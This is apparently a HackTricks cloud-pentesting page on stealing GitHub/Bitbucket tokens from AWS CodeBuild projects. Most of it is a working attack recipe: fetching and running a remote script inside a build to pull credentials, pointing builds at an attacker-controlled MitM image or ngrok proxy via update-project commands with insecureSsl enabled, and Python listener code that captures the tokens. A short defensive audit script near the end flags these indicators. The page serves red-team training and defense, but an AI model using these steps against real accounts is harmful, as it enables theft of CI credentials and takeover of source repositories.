AWS Codebuild - Token Leakage

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Get the configured Github/Bitbucket tokens

First, check whether there are any configured source credentials that you could leak:

aws codebuild list-source-credentials

Via RCE in a CodeBuild job

From inside a CodeBuild job you can reach an undocumented AWS CodeBuild API endpoint that returns the credentials CodeBuild is using. This can be used to obtain the credentials the CodeBuild job was started with, for example AWS CodeConnection credentials, OAuth or PAT credentials. The CodeBuild job does not need to be privileged to reach this endpoint, and the call is hard to spot in logging and monitoring because CodeBuild itself calls the same endpoint several times during startup.

The technique is described in more detail at https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/ but, in short, to obtain the credentials inside a CodeBuild job you only need to run the following:

python -m pip install botocore boto3 requests
wget https://raw.githubusercontent.com/thomaspreece/AWS-CodeFactoryTokenService-API/refs/heads/main/GetBuildInfo.py
python ./GetBuildInfo.py

Via Docker image

If you find that authentication to, for example, Github is configured in the account, you can exfiltrate that access (GH token or OAuth token) by making CodeBuild use a specific Docker image to run the project build.

For this purpose you can create a new CodeBuild project or modify the environment of an existing one to set the Docker image.

The Docker image you can use is https://github.com/carlospolop/docker-mitm. It is a very simple Docker image that sets the env variables https_proxy, http_proxy and SSL_CERT_FILE. This makes the host send most of its traffic through the proxy indicated in https_proxy and http_proxy and trust the SSL cert indicated in SSL_CERT_FILE.

  1. Create & upload your own Docker MitM image
  • Follow the instructions in the repo to set your proxy IP and your SSL cert and build the Docker image.
  • DO NOT SET http_proxy, so that requests to the metadata endpoint are not intercepted.
  • You can use ngrok, e.g. ngrok tcp 4444, to expose the proxy on your host.
  • Once you have built the Docker image, upload it to a public repo (Dockerhub, ECR…).
  2. Set the environment
  • Create a new CodeBuild project or modify the environment of an existing one.
  • Set the project to use the previously generated Docker image.
  3. Set the MitM proxy on your host
  • As indicated in the Github repo, you can use something like:
mitmproxy --listen-port 4444 --allow-hosts "github.com"

Tip

The mitmproxy version used was 9.0.1; it was reported that with version 10 this might not work.

  4. Run the build & capture the credentials
  • You can see the token in the Authorization header:

This can also be done from the aws cli with something like:

# Create the project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## Contents of /tmp/buildspec.json (use "ARM_CONTAINER" as environment.type to run the ARM docker-mitm image)
{
  "name": "my-demo-project",
  "source": {
    "type": "GITHUB",
    "location": "https://github.com/uname/repo",
    "buildspec": "buildspec.yml"
  },
  "artifacts": {
    "type": "NO_ARTIFACTS"
  },
  "environment": {
    "type": "LINUX_CONTAINER",
    "image": "docker.io/carlospolop/docker-mitm:v12",
    "computeType": "BUILD_GENERAL1_SMALL",
    "imagePullCredentialsType": "CODEBUILD"
  }
}

# Start the build (same project name as in the JSON above)
aws codebuild start-build --project-name my-demo-project

Via insecureSsl

CodeBuild projects have a setting called insecureSsl that is hidden in the web console; you can only change it through the API.
Enabling it allows CodeBuild to connect to the repository without validating the certificate presented by the platform.

  • First you need to list the current configuration with something like:
aws codebuild batch-get-projects --name <proj-name>
  • Then, with the information you gathered, you can update the project setting insecureSsl to true. Below is an example of how I updated the project; note insecureSsl=true at the end (this is the only thing you need to change in the gathered configuration).
  • Moreover, also add the environment variables http_proxy and https_proxy pointing to your ngrok tcp tunnel, like:
aws codebuild update-project --name <proj-name> \
  --source '{
    "type": "GITHUB",
    "location": "https://github.com/carlospolop/404checker",
    "gitCloneDepth": 1,
    "gitSubmodulesConfig": {
      "fetchSubmodules": false
    },
    "buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
    "auth": {
      "type": "CODECONNECTIONS",
      "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
    },
    "reportBuildStatus": false,
    "insecureSsl": true
  }' \
  --environment '{
    "type": "LINUX_CONTAINER",
    "image": "aws/codebuild/standard:5.0",
    "computeType": "BUILD_GENERAL1_SMALL",
    "environmentVariables": [
      {
        "name": "http_proxy",
        "value": "http://2.tcp.eu.ngrok.io:15027"
      },
      {
        "name": "https_proxy",
        "value": "http://2.tcp.eu.ngrok.io:15027"
      }
    ]
  }'
  • Then, run the basic example from https://github.com/synchronizing/mitm on the port the proxy variables point to:
from mitm import MITM, protocol, middleware, crypto

# Listen on the port that http_proxy / https_proxy point to
mitm = MITM(
    host="127.0.0.1",
    port=4444,
    protocols=[protocol.HTTP],
    middlewares=[middleware.Log],  # middleware.HTTPLog is used in the example below
    certificate_authority=crypto.CertificateAuthority(),
)
mitm.run()
  • Finally, click on Build the project; the credentials will be sent in clear text (base64) to the mitm port:

Via HTTP protocol

Tip

This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)

An attacker with elevated permissions over a CodeBuild project could leak the configured Github/Bitbucket token or, if the permissions were granted via OAuth, the temporary OAuth token used to access the code.

  • The attacker can add the environment variables http_proxy and https_proxy to the CodeBuild project, pointing to their machine (for example http://5.tcp.eu.ngrok.io:14972).
  • Then, change the URL of the Github repo to use HTTP instead of HTTPS, for example: http://github.com/carlospolop-forks/TestActions
  • Then, run the basic example from https://github.com/synchronizing/mitm on the port indicated in the proxy variables (http_proxy and https_proxy):
from mitm import MITM, protocol, middleware, crypto

# Listen on all interfaces on the port that http_proxy / https_proxy point to
mitm = MITM(
    host="0.0.0.0",
    port=4444,
    protocols=[protocol.HTTP],
    middlewares=[middleware.Log],  # middleware.HTTPLog is used in the example below
    certificate_authority=crypto.CertificateAuthority(),
)
mitm.run()
  • Next, click Build the project or start the build from the command line:
aws codebuild start-build --project-name <proj-name>
  • Finally, the credentials will be sent in clear text (base64) to the mitm port:

Warning

The attacker will now be able to use the token from their own machine, enumerate all the permissions it holds and (ab)use it far more easily than by going through the CodeBuild service directly.
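All three variants above leave traces in the project configuration itself: insecureSsl set via the API, an http:// source location, http_proxy/https_proxy environment variables, or a non-AWS build image. The following audit script is an added defensive example (not code from this page, HackTricks or AWS) that pulls every CodeBuild project with boto3 and flags those indicators; audit_project() works on plain project dicts so it can also be run over exported configuration, and the sample input in the test is constructed.

```python
"""Audit AWS CodeBuild projects for the token-leak indicators described above.

Flags: source.insecureSsl=true, plain-HTTP source locations, proxy/cert
environment variable overrides, and build images outside aws/codebuild/*.
"""
import re

AWS_IMAGE = re.compile(r"^aws/codebuild/")
# Variable names compared case-insensitively (HTTP_PROXY and http_proxy both work)
OVERRIDE_VARS = {"http_proxy", "https_proxy", "ssl_cert_file"}


def audit_project(project: dict) -> list:
    """Return (severity, message) findings for one project dict shaped like an
    element of codebuild.batch_get_projects()["projects"]."""
    findings = []
    name = project.get("name", "<unnamed>")
    source = project.get("source", {})
    env = project.get("environment", {})

    if source.get("insecureSsl"):
        findings.append(("HIGH", f"{name}: source.insecureSsl is enabled (TLS validation off)"))
    location = source.get("location", "")
    if location.lower().startswith("http://"):
        findings.append(("HIGH", f"{name}: source location uses plain HTTP: {location}"))
    for var in env.get("environmentVariables", []):
        if var.get("name", "").lower() in OVERRIDE_VARS:
            findings.append(("HIGH", f"{name}: proxy/cert override {var['name']}={var.get('value')}"))
    image = env.get("image", "")
    if image and not AWS_IMAGE.match(image):
        findings.append(("MEDIUM", f"{name}: custom build image {image}"))
    return findings


def audit_account(region: str = "us-east-1") -> list:
    """Fetch every project in the region (real API calls, needs credentials) and audit it."""
    import boto3  # imported here so audit_project() runs without boto3 installed
    cb = boto3.client("codebuild", region_name=region)
    names = []
    for page in cb.get_paginator("list_projects").paginate():
        names.extend(page["projects"])
    findings = []
    for i in range(0, len(names), 100):  # batch_get_projects accepts at most 100 names
        for proj in cb.batch_get_projects(names=names[i:i + 100])["projects"]:
            findings.extend(audit_project(proj))
    return findings


if __name__ == "__main__":
    for severity, message in audit_account():
        print(severity, message)
```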

Untrusted PR execution via webhook filter misconfiguration

For the PR-triggered webhook bypass chain (ACTOR_ACCOUNT_ID regex + untrusted PR execution), see:

AWS CodeBuild - Untrusted PR Webhook Bypass (CodeBreach-style)
